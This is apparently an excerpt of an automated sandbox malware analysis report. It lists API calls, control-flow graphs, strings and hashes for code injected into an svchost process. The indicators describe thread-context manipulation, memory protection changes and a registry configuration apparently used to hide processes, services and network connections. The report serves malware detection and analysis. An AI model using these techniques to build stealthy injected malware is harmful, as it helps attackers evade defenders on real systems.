                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 98342572f17e2c0f2849f571926a9787cb47dc2932bdc1abf01c5f5f531664da
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 9E711A36320E5287EB519FA5E8516DD37B4FB88B88F509112DE4E67B28DF38C654CB00

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: 2d506e39111b7379acd4fe2d0cdba02ec8daa9c9dbde34a741125ca1e3d536cb
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 8611807166063383FB6A9761F8463FD2290BB54304F54C0279A0AA51DDEF7DD3588F50

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000001845B3B1650: GetProcessHeap.KERNEL32 ref: 000001845B3B165B
                                                  • Part of subcall function 000001845B3B1650: HeapAlloc.KERNEL32 ref: 000001845B3B166A
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B16DA
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B1707
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B1721
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B1741
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B175C
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B177C
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B1797
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B17B7
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B17D2
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B17F2
                                                • Sleep.KERNEL32 ref: 000001845B3B1C43
                                                • SleepEx.KERNEL32 ref: 000001845B3B1C49
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B180D
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B182D
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B1848
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B1868
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B1883
                                                  • Part of subcall function 000001845B3B1650: RegOpenKeyExW.ADVAPI32 ref: 000001845B3B18A3
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B18BE
                                                  • Part of subcall function 000001845B3B1650: RegCloseKey.ADVAPI32 ref: 000001845B3B18C8
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: bb2cde7bac9d719374424f638cc156d4d42a03c104884bf0f9dc72d96ce6d1e1
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 0C31C036220E0393FB509F26D5653EE22A4BB44BC0F24D427DE09A779EDF24C6648B50

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: a4923edc744da127f6deaf9afdc14ff09d5c36fdb56d9285ac2a8b19b68281a1
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 36416E33624B819BE7658F62E4447DEB7A1F389B84F10812ADB8917B58DF38D665CF00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 1845b3b9804-1845b3b9842 375 1845b3b9933 374->375 376 1845b3b9848-1845b3b984b 374->376 377 1845b3b9935-1845b3b9951 375->377 376->377 378 1845b3b9851 376->378 379 1845b3b9854 378->379 380 1845b3b992b 379->380 381 1845b3b985a-1845b3b9869 379->381 380->375 382 1845b3b9876-1845b3b9895 LoadLibraryExW 381->382 383 1845b3b986b-1845b3b986e 381->383 386 1845b3b98ed-1845b3b9902 382->386 387 1845b3b9897-1845b3b98a0 call 1845b3c3080 382->387 384 1845b3b990d-1845b3b991c call 1845b3c3090 383->384 385 1845b3b9874 383->385 384->380 394 1845b3b991e-1845b3b9929 384->394 388 1845b3b98e1-1845b3b98e8 385->388 386->384 390 1845b3b9904-1845b3b9907 FreeLibrary 386->390 395 1845b3b98cf-1845b3b98d9 387->395 396 1845b3b98a2-1845b3b98b7 call 1845b3bad28 387->396 388->379 390->384 394->377 395->388 396->395 399 1845b3b98b9-1845b3b98cd LoadLibraryExW 396->399 399->386 399->395
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: d4a12d9cf17e65e49c4d751932863152665286e8903b2bad97d95481339c7938
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 8031B432312B5297FE52DB12A8107DD7394FB08BA0F198626DD2D6B388FF38D6458B00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 423 1845b3b5c10-1845b3b5c37 424 1845b3b5c4b-1845b3b5c56 GetCurrentThreadId 423->424 425 1845b3b5c39-1845b3b5c48 423->425 426 1845b3b5c62-1845b3b5c69 424->426 427 1845b3b5c58-1845b3b5c5d 424->427 425->424 429 1845b3b5c7b-1845b3b5c8f 426->429 430 1845b3b5c6b-1845b3b5c76 call 1845b3b5a40 426->430 428 1845b3b608f-1845b3b60a6 call 1845b3b7a20 427->428 433 1845b3b5c9e-1845b3b5ca4 429->433 430->428 436 1845b3b5d75-1845b3b5d96 433->436 437 1845b3b5caa-1845b3b5cb3 433->437 442 1845b3b5eff-1845b3b5f10 call 1845b3b759f 436->442 443 1845b3b5d9c-1845b3b5dbc GetThreadContext 436->443 439 1845b3b5cb5-1845b3b5cf8 call 1845b3b86a0 437->439 440 1845b3b5cfa-1845b3b5d6d call 1845b3b45f0 call 1845b3b4590 call 1845b3b4550 437->440 450 1845b3b5d70 439->450 440->450 454 1845b3b5f15-1845b3b5f1b 442->454 446 1845b3b5dc2-1845b3b5de3 443->446 447 1845b3b5efa 443->447 446->447 457 1845b3b5de9-1845b3b5df2 446->457 447->442 450->433 458 1845b3b5fde-1845b3b5fee 454->458 459 1845b3b5f21-1845b3b5f78 VirtualProtect FlushInstructionCache 454->459 461 1845b3b5e72-1845b3b5e83 457->461 462 1845b3b5df4-1845b3b5e05 457->462 468 1845b3b5ffe-1845b3b600a call 1845b3b4ed0 458->468 469 1845b3b5ff0-1845b3b5ff7 458->469 463 1845b3b5f7a-1845b3b5f84 459->463 464 1845b3b5fa9-1845b3b5fd9 call 1845b3b798c 459->464 465 1845b3b5ef5 461->465 466 1845b3b5e85-1845b3b5ea3 461->466 470 1845b3b5e6d 462->470 471 1845b3b5e07-1845b3b5e1c 462->471 463->464 473 1845b3b5f86-1845b3b5fa1 call 1845b3b4470 463->473 464->454 466->465 474 1845b3b5ea5-1845b3b5ef0 call 1845b3b39e0 call 1845b3b75bd 466->474 484 1845b3b600f-1845b3b6015 468->484 469->468 476 1845b3b5ff9 call 1845b3b44c0 469->476 470->465 471->470 472 1845b3b5e1e-1845b3b5e68 call 1845b3b3a50 SetThreadContext 471->472 472->470 473->464 474->465 476->468 488 1845b3b6057-1845b3b6075 484->488 489 1845b3b6017-1845b3b6055 ResumeThread call 1845b3b798c 484->489 492 1845b3b6077-1845b3b6086 488->492 493 1845b3b6089 488->493 489->484 492->493 493->428
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: e1134a68999cd82f49d26887fea5dcff660b6a1dd8b1d277fb91a56fc4ead8e3
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: ACD18C76209B8983DA709B1AE49539EB7A0F7C8B84F114117EACD57BA9DF38C651CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 99001781fff36d6b6543338c99b3f9985a25c105236edbf87ff72f08a38a28e2
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: E881CE36A10A928BFB529FA5C8403ED26A1FB44B88F44C157DE0A73696DF34D666CF10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: e15df84fc823a1b0a8080f26815e54af943de2d6df9d85adbd029ac8536d2e41
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 2D113C3A704B5287FB559B51F4043ED76A0FB48B84F04802ADE8957798EF3DC618CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001F.00000002.2946625946.000001845B3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001845B3B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_31_2_1845b3b0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: 0ec10cd046e312453db3ae1bc249c305b61370af3cc55c833d68979488b95ce3
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: 30118B32524F899BE755EFA6E80029E7370FB89B80F04901ADB8A23718DF3CC1218B00